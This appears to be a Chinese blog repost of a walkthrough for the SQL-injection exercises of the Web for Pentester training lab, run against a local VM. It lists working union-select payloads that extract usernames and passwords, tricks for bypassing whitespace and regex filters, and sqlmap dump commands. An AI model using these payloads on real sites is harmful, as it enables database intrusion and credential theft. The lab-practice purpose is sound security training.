Web for pentester_writeup之SQL injections篇

最新推荐文章于 2023-09-01 22:59:58 发布
最新推荐文章于 2023-09-01 22:59:58 发布
阅读量405 收藏 2
点赞数
文章标签: php 数据库 python
原文链接:http://www.cnblogs.com/liliyuanshangcao/p/11315282.html
版权

Web for pentester_writeup之SQL injections篇

SQL injections(SQL注入)

Example 1

1605154-20190807171733506-548166565.png

测试参数,添加 and '1'='1'and '1'='2判断存在注入

1605154-20190807171757450-1555795477.png

1605154-20190807171835191-79828721.png

猜解查询列数(%23为#号的URL编码,注释原有结构的单引号
http://192.168.219.136/sqli/example1.php?name=root' order by 5 %23

1605154-20190807171933846-1314951168.png

http://192.168.219.136/sqli/example1.php?name=root' order by 6 %23
1605154-20190807171945859-1788452847.png

所以查询列数为5,构造union联合查询语句查询页面输出的列
http://192.168.219.136/sqli/example1.php?name=root' union select 1,2,3,4,5%23

1605154-20190807175242319-1820670032.png

打印输出的列为123,利用输出的列数查询数据库版本,路径和当前数据库
http://192.168.219.136/sqli/example1.php?name=root' union select @@version,@@datadir,database(),4,5%23

1605154-20190807175302789-113659618.png

查询当前数据库中包含的表,注意数据库名称需要用十六进行进行编码exercises=>0x657865726369736573
http://192.168.219.136/sqli/example1.php?name=root' union select TABLE_NAME,@@datadir,database(),4,5 from information_schema.TABLES where TABLE_SCHEMA=0x657865726369736573%23

1605154-20190807175310732-1598778485.png

获取TABLE_NAME表名为users,查询当前表中包含的列,表名也要用十六进制进步编码users=>0x7573657273
http://192.168.219.136/sqli/example1.php?name=root' union select COLUMN_NAME,@@datadir,database(),4,5 from information_schema.COLUMNS where TABLE_NAME=0x7573657273%23

1605154-20190807175542229-1060854415.png

可打印项为3项,我们选择idnamepasswd打印输出

Payload :
http://192.168.219.136/sqli/example1.php?name=root' union select id,name,passwd,4,5 from users%23

1605154-20190807175554777-2079674820.png

成功获取了管理员的账号和密码

Example 2

1605154-20190807175622443-531349251.png

测试发现无法输入空格,那么我们使用\t\n的URL编码来替换空格

Payload1(\n,换行LF)
http://192.168.219.136/sqli/example2.php?name=root'%0aunion%0aselect%0aid,name,passwd,4,5%0afrom%0ausers%23

1605154-20190807175637474-720761022.png

Payload2(归位CR)
http://192.168.219.136/sqli/example2.php?name=root'%0dunion%0dselect%0did,name,passwd,4,5%0dfrom%0dusers%23

1605154-20190807175652405-960820701.png

Payload3(\t,水平定位HT)
http://192.168.219.136/sqli/example2.php?name=root'%09union%09select%09id,name,passwd,4,5%09from%09users%23

1605154-20190807175713803-508223315.png

Payload4 (使用/注释/方法)
http://192.168.219.136/sqli/example2.php?name=root'/**/union/**/select/**/id,name,passwd,4,5/**/from/**/users%23

1605154-20190807175742279-400641263.png

Example 3

测试例2中的payload发现匹配任何空白字符,包括空格、制表符、换页符等,全部过滤掉
只有注释payload成功注入

Payload
http://192.168.219.136/sqli/example3.php?name=root'/**/union/**/select/**/id,name,passwd,4,5/**/from/**/users%23

1605154-20190807175803166-1254487174.png

Example 4

1605154-20190807175824674-1465355104.png

由字符型变为数字型注入,猜测表结构还是一致,直接修改上述payload,去掉单引号,后面的%23即#号注释符号也可以去掉了

Payload
http://192.168.219.136/sqli/example4.php?id=2 union select id,name,passwd,4,5 from users

1605154-20190807175845532-1690623055.png

Example 5

发现使用之前的payload可以直接注入成功

Payload
http://192.168.219.136/sqli/example5.php?id=2 union select id,name,passwd,4,5 from users

1605154-20190807175859827-950835635.png

查看资料可知考察的是正则表达式

1605154-20190807175930414-427272176.png

输入的id字段必须是数字开头,不能是字符

1605154-20190807180026597-1635541673.png

Example 6

查看资料

1605154-20190807180037883-1562762678.png

可知同样是考察正则表达式,要求id的输入最后一个字符必须是数字,所以使用payload
http://192.168.219.136/sqli/example6.php?id=5 union select id,name,passwd,4,5 from users提示注入失败

1605154-20190807180059366-1202415725.png

那么当我们需要注释的时候如何处理这种情况呢?我们可以在注释的后面再加上数字即可

Payload
http://192.168.219.136/sqli/example6.php?id=5 union select id,name,passwd,4,5 from users %23 123

1605154-20190807180111695-1391462977.png

Example 7

注入失败,查看资料可知

1605154-20190807180132934-2027167472.png

后台查询语句用/m进行了限制,“行起始”和“行结束”除了匹配整个字符串开头和结束外,还分别匹配其中的换行符的之后和之前,所以我们可以在原语句中加入换行符,在换行符后输入payload(\n=>%0A),即会判断整个同一行的参数是否符合,通过\n换行符来将参数和payload分开在不同行。

Payload
http://192.168.219.136/sqli/example7.php?id=5%0A union select id,name,passwd,4,5 from users %23 123

1605154-20190807180142327-316212507.png

Example 8

1605154-20190807180155300-1018850328.png

这一题涉及到的知识点是order by的注入,查看参考资料

1605154-20190807180201636-817502011.png

有两种order by情况:
直接排序:order by name
使用 ` 符号排序: order by `name`

<1> payload: order=name%23`,没有返回结果

1605154-20190807180256210-1133840189.png

<2> payload: order=name\`%23

1605154-20190807180308962-1067391326.png

<3> payload: order=name`desc%23

1605154-20190807180318555-1103667940.png

可以确定是order by `name`类型排序,只能通过盲注了,直接上神器SQLMAP

Payload
sqlmap.py -u "http://192.168.219.136/sqli/example8.php?order=name" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

1605154-20190807180330791-1180011646.png

qlmap.py -u "http://192.168.219.136/sqli/example8.php?order=name" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D exercises --dump

1605154-20190807180336558-125932082.png

Example 9

本例和上面相似,
<1> payload: order=name%23

1605154-20190807180349994-540984116.png

<2> payload: order=name`%23,没有返回结果
1605154-20190807180355708-1253482630.png

简单测试后发现排序类型是order by name

同样,直接盲注,上SQLMAP神器

Payload
sqlmap.py -u "http://192.168.219.136/sqli/example9.php?order=name" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

1605154-20190807180409008-403729083.png

sqlmap.py -u "http://192.168.219.136/sqli/example9.php?order=name" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D exercises --dump

1605154-20190807180425843-36257061.png

转载于:https://www.cnblogs.com/liliyuanshangcao/p/11315282.html

ditanji3425
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全提高] 一〇五.SQL注入之揭秘Oracle数据库注入漏洞和致命问题(联合Cream老师)
杨秀璋的专栏
03-24 6587
前文带领大家搭建一个Oracle+phpStudy本地网络渗透靶场,并应用SQL注入、XSS攻击、文件上传漏洞三个场景。这文章将跟着Cream老师兼好友学习,结合自己的经验详细介绍Oracle数据库注入漏洞和致命问题,包括各种类型的注入知识。注入漏洞是安全威胁中比较常见的漏洞,Oracle也是用得最广的数据库,希望这文章对您有帮助。真心觉得Cream老师讲解非常厉害,且看且珍惜。
SQL注入漏洞测试实战
weixin_47493074的博客
09-19 572
sqlmap小测试
SQL注入】CTF练习题WriteUp——“百度杯”CTF比赛 九月场SQL
Fighting_hawk的博客
05-17 3483
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
SQL注入原理深度解析
等着你的出现
02-18 265
对于Web应用来说,注射式攻击由来已久,攻击方式也五花八门,常见的攻击方式有SQL注射、命令注射以及新近才出现的XPath注射等等。本文将以SQL注射为例,在源码级对其攻击原理进行深入的讲解。 一、注射式攻击的原理注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明。这使得攻击者有机会将程序命令当作用户输入的数据提交给Web程序,以发号施令,为所欲为。为了发动注射攻击,攻击者...
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 395
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
web_for_pentester.pdf
04-02
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。
web_for_pentester镜像文件
08-05
网络安全渗透测试环境镜像文件,直接装在虚拟机上可运行
web_for_pentester.zip
11-26
web_for_pentester
web-for-pentester源码.rar
最新发布
07-13
web-for-pentester源码
实验吧-简单的sql注入3 Writeup
baynk的博客
07-29 340
继续继续 过程 输入1,然后发现只有一个hello。。。好吧,肯定得盲注了,先试试闭合吧,果然还是单引号的,但是居然有报错信息,应该也可以使用报错注入吧。 然后再尝试干掉单引号的时候意外发现#居然可以用了,这真是省了不少事。。 想来想去还是使用报错注入,盲注还是交给sqlmap来解决吧。先来搞库名,用的floor(),结果来这么一出。 don't到底是个啥,又换了两种其他的报错,updatexm...
渗透攻防Web-SQL注入攻击中级
人人为我,我为人人
12-29 616
前言找到SQL注入漏洞后,我们可以用它来干什么呢?那么本文章给大家带来的就是SQL注入漏洞利用技术,现在是时候让我们去体验一下漏洞利用的乐趣了。 目录 第三节 利用SQL注入 3.1、识别数据库 3.2、UNION语句提取数据 3.3、枚举数据库 3.4、窃取哈希口令 3.5、获取WebShell 第四节 SQL盲注利用 4.1、初识SQL盲注 4.2、SQL盲注入技术-基于布尔 4.3、SQL盲注入技术-基于时间 4.4、我们的好朋友-Python 正文 第三节 利用SQL注.
Sql注入实战
永不垂头的博客
07-27 1307
学习笔记—Sql注入实战 一、编写注入的网页,用于实战。 index.php link.php 在老板火狐中开启hackbar, 进行sql注入。 Google中hackbar破解方法: https://www.fujieace.com/hacker/tools/hackbar.html 二、Sql注入基本流程(实战): 输入单引号报如下错误 1=1与1=2的区别:(参考链接: https://www.cnblogs.com/xyz315/p/13043950.html)第一步,判断是否
SQL Injections及sqli-labs练习
weixin_54347738的博客
09-01 204
从数组中取值取出它的key,将值放入前端并写了html样式,若没取到,mysql会将报错打印,若最上面未使用get传参id,则会让你输入数字类型的id。①使用get传参,语句中传入的id,其实是users表中的id,id字段其实就类似于身份证编号是唯一可以区分用户的,如下图所示:使用id作为限制条件查出某个人:②将下图中的注释打开,即可得到我们查询到的数组的数据由上图可知,数组是以key取值的。
DVWA 之 SQL Injection
baynk的博客
10-29 1684
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
Web for Pentester II练习题解
Shinpachi8的博客
01-14 2295
最近一直在找mongodb的注入练习,结果在penetsterlab上找到了。发现了其中的web for pentester 2, 其实我并没有做过第一版。有兴趣同学可以试着做做这一套练习包括:SQL注入,认证,授权,验证码, 覆盖属性,随机数问题,mongodb注入几部分。其中除随机数没有做出来,其他的都有解法。在pentesterlab上下载iso镜像直接用在虚拟机打开就可以了。我用的是virtualbox。
1 SQL injection
(∪.∪ )...zzz的博客
04-18 930
SQL injection 目录SQL injection一、What二、Influence三、SQL injection examples1.retrieving hidden data检索隐藏数据lab 12.subverting application logic颠覆应用程序逻辑lab2 SQL injection vulnerability allowing login bypass3.UNION attacks4. Examining the database检查数据库5.Blind SQL
白话sql注入(sql Injection)系统总结
weixin_54603520的博客
03-23 952
数据库就是一个存储数据的仓库,数据库是以一定方式存储在一起,能与多个用户共享,具有尽可能小的冗余,与应用程序彼此独立的数据集合。mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表,mysql权限表的验证过程为:先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在,存在则通过验证。通过身份认证后,进行权限分配,
Web for Pentester SQL注入example 1-7 答案解析
u011975363的专栏
04-16 5120
pentester lab镜像下载地址为https://pentesterlab.com/exercises/web_for_pentester/course,下载.iso镜像,在虚拟机中搭建,查看虚拟机ip,在浏览器中输入虚拟机Ip,即可看到练习题界面,sql注入的界面如图所示: 一、example 1 1、首先判断是否存在注入点及注入类型 由此可知,存在字符型注入,且没有设置...
SQL注入——SQL Injection
djh1179的博客
09-27 269
本文部分内容转自:https://www.cnblogs.com/rush/archive/2011/12/31/2309203.html http://www.diybl.com/course/7_databases/sql/msshl/2007616/59684_2.html 目录: 一、什么是s...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值